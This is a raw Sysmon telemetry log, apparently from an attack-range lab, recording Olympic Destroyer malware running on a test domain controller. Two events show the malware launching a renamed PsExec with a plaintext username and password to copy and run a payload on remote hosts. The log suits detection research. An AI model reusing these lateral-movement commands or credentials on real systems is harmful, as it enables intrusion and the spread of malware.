10341000x8000000000000000292596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.353{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1309-6216-1D06-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.355{C8EA50B7-1309-6216-1D06-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.353{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1309-6216-1D06-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.238{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1309-6216-1C06-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.238{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.238{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.238{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.238{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.238{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-1309-6216-1C06-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.239{C8EA50B7-1309-6216-1C06-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.238{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1309-6216-1C06-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.222{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE15AB50021EF5F10C0BCAE69357921A,SHA256=4CB61DCC85CDF55196927F5EE7137305D79831FD58AEE3B1D1BCD2E749F91C14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217773Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:14.650{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=591975896730088118DD82D3616E4467,SHA256=DD69BB4388DFE0FBBA0E3043D280E2B01839B23591EDA75DDEF9CB7D3D4ED33F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:14.622{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E5FA3E4D69DEAEB765C04EC92C5878FB,SHA256=2325AFBC5F5EA7D53FE8649437CABEE696AA2982EC2668D0607287FA18D367D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:14.522{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=272E0DE49AC8EE10E8FD81606445AFDB,SHA256=204BD10112979F3E3396557EEF06B23F4A663E6214F6FD9CE69126B5E402159F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:14.502{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54AAF31BFA41249DF99F6DB13C2AD470,SHA256=9A3D338CB59E1C3233685F9557B63D2DD691141D31443B54ED9763E7B9100551,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000292654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.939{C8EA50B7-1309-6216-2106-000000003802}6748C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.923{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1309-6216-2106-000000003802}6748C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.923{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1309-6216-2106-000000003802}6748C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:13.901{C8EA50B7-1309-6216-2106-000000003802}6748C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.854{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1309-6216-2306-000000003802}6980C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.854{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1309-6216-2306-000000003802}6980C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.839{C8EA50B7-1309-6216-2306-000000003802}69801624C:\Windows\system32\conhost.exe{C8EA50B7-1309-6216-2106-000000003802}6748C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.801{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1309-6216-2306-000000003802}6980C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 534500x8000000000000000292646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.801{C8EA50B7-1309-6216-2006-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.801{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.801{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.801{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.801{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.785{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1309-6216-2306-000000003802}6980C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217774Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:15.743{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C289C7FA5FE3AEEB7DF736824BCF0B2D,SHA256=28CED331B9131CD1DCAFE646F5053F7EDAD385CCFF2B8D17D6776B854CD4F3B3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.969{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-130B-6216-2506-000000003802}6716C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.969{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-130B-6216-2506-000000003802}6716C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.938{C8EA50B7-130B-6216-2506-000000003802}67164176C:\Windows\system32\conhost.exe{C8EA50B7-130B-6216-2406-000000003802}6664C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 